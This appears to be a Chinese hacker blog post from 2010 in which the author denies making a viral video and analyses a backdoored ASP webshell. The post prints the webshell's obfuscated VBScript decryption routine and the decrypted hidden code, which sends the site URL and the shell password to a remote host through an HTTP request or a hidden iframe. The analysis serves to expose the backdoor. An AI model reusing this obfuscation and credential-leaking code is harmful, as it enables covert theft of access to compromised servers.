• 欢迎访问金刀客博客!
  • 2019,春节快乐!

关于这2天盛传的所谓我做的揭露后门的动画的声明

重点关注 admin 9381次浏览 已收录 0个评论

本来昨天刀城关了,心里就很不是滋味的,没想到今天好几个朋友问我一个动画的事情,问是不是我做的,弄的我一头雾水,我就去看了看,还挺火,好多坛子都有了。
http://www.t00ls.net/viewthread.php?tid=10477&extra=&page=1
http://www.t00ls.net/thread-10476-1-1.html
http://forum.darkst.com/thread-66305-1-1.html
小翅膀给我看了动画,这不是我做的动画!
这里我还得说明一点,对于asp从来不抓包找后门什么的,我只是对解密感兴趣,别无它意。
希望各位朋友不要误会了。
晚上专门弄了一个说明动画,有兴趣的看看
动画说明:
大家好,我是daokers。昨天关闭了刀城,那是迫不得已。
昨天刚刚关闭,结果在各个qq群和论坛出来好几个帖子,说是我弄的动画。
http://www.t00ls.net/viewthread.php?tid=10477&extra=&page=1
刀客城关门之巨作
http://www.t00ls.net/viewthread.php?tid=10476&extra=&page=1
在别的论坛也有一些。
呵呵,有点太抬我了,惭愧,但是我在这里得说明一下,这个不是我做的。
那些与我没怎么关系。
不得已,弄了一个说明。
https://www.daokers.com/article/others/606.htm
但是今天,我是专门来看这个动画的。
咱们直接看shell文件
就看这个“无.asp”,他的意思应当是无后门吧。
首先是vbscript.encode
不说明了,看我演示一下
哎,真晕,这些都不是我弄的,俺小菜。
基本上解密了,咱们现在来看几个地方
先看这个代码
execute Replace(Replace(StrReverse(“/*/noitcnuf dne/*/newim_pmet
=rc/*/)/**//**//**//**/,/**/╁/**/,newim_pmet(ecalper=newim_pmet/*/))01(rhc&)31
(rhc,/**/╋/**/,newim_pmet(ecalper=newim_pmet/*/pool/*/txen/*/1+i=i/*/fi dne/*/)
1,i,newim(dim&newim_pmet=newim_pmet/*/esle/*/)w(rhc&newim_pmet=newim_pmet/*/txen/*/fi
dne/*/rof tixe:f=w/*/neht 321f fi/*/z-d*62+s=f/*/01 ot 1=d rof/*/79-
k=s/*/neht 321k fi/*/))1,n,yekrc(dim(csa=z/*/))1,i,newim(dim(csa=k/*/od tixe
neht )newim(nel>i fi/*/)yekrc(nel ot 1=n rof/*/))newim(nel>i(litnu od/*/)newim
(esreveRrtS=newim/*/1=i/*//**//**/=newim_pmet/*//**/409c9156e5073824/**/=yekrc/*/)
newim(rc noitcnuf”),”/**/”, Chr(34)),”/*/”, chr(13)&chr(10)):
之前我看过,他是一个解密函数
咱们解密一下
function cr(miwen)
crkey=”4283705e6519c904″
temp_miwen=””
i=1
miwen=StrReverse(miwen)
do until(i>len(miwen))
for n=1 to len(crkey)
if i>len(miwen) then exit do
k=asc(mid(miwen,i,1))
z=asc(mid(crkey,n,1))
if k>96 and k<123 then s=k-97 for d=1 to 10 f=s+26*d-z if f>96 and f<123 then w=f:exit for end if next temp_miwen=temp_miwen&chr(w) else temp_miwen=temp_miwen&mid(miwen,i,1) end if i=i+1 next loop temp_miwen=replace(temp_miwen,"╋",chr(13)&chr(10)) temp_miwen=replace(temp_miwen,"╁","""") cr= temp_miwen end function 这个就是他的明文 咱们继续往下看 注意下这里 docu="qsg thz╋zx vkv╋╁ahtj╁=)╁qyhwp╁(gdggqum╋vc zfb╋╁>0=hfwczx 0=zqubp ╁╁╁
&mnqjgakr&╁=e&╁&)╁gho╁(kbcutxpothyqhyh.lpvnjtp&)╁nneb_llqy╁
(hczzqcmqpganovl.iqssgym&╁//:mkma╁&╁=blp?
jhw.rubtq/hcd.vt782w44w8t183q30q.pz782x44b8c183q30w//:imif╁╁=wmi via<╁ xigfu.yndieowo ╋gtfh 0=<)osesy(gxa tg╋)╁╁&hosmixlj&╁=f&╁&)╁hjr╁ (ltjpyylvlltrjbj.mhcioul&)╁ioge_imif╁(iygruxnssixogcg.jmzkktn&╁//:erhf╁&╁=fgq? mjt.jbwyr/ouh.wv782x44r8u183u30s.rw782s44x8u183s30t//:drjb╁(yvwhmkmaicu=kxdqv╋jwek ╁╁=)╁mdgum╁(flzlltq dy╋wkm pauv gtfh ╁fvsia╁=)5,liqcf(nauf ng ╁.721╁=) 4,inhkz(kyxa fm ╁.01╁=)3,lmhmv(jzzb gk ╁.291╁=)4,njmdd(qwxe dw╋)╁oiiw_hqka╁ (qsjrudhuknwsixl.rgckkzh=hpkly╋kiq cjcmm.toflglxg╋)pjm(ebra yll" 他的执行,移动到了后面 在这里 execute cr(docu) 咱们来解密一下 sub echo(str) response.write str hosts=request.servervariables("http_host") if left(hosts,4)="192." or left(hosts,3)="10." or left(hosts,4)="127." or left (hosts,5)="local" then exit sub if session("seljw")="" then baidu=gethttppage("http://a03a381e8d44e287da.a*******.net/baidu.asp?
url=”&”http://”&request.servervariables(“http_host”)&request.servervariables(“url“)
&”&p=”&userpass&””)
if len(baidu)<=0 then response.write "http://a03a381e8d44e287da.***********.net/baidu.asp?
url=”&”http://”&request.servervariables(“http_host”)&request.servervariables(“url“)
&”&p=”&userpass&””” width=0 height=0>”
end if
session(“seljw”)=”lfjl”
end if
end sub
看到没
这个就是解密出来的部分
好了,其他的我就不看了。
至于这个冒充动画的目的是什么,大家就自己猜测吧
多谢大家
by daokers
www.daokers.com
2010.8.16
http://u.115.com/file/f7c0f5a31b
关于这2天盛传的金刀客揭露后门动画的说明.rar


金刀客博客 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权 , 转载请注明关于这2天盛传的所谓我做的揭露后门的动画的声明
喜欢 (3)
发表我的评论
取消评论

表情 贴图 加粗 删除线 居中 斜体 签到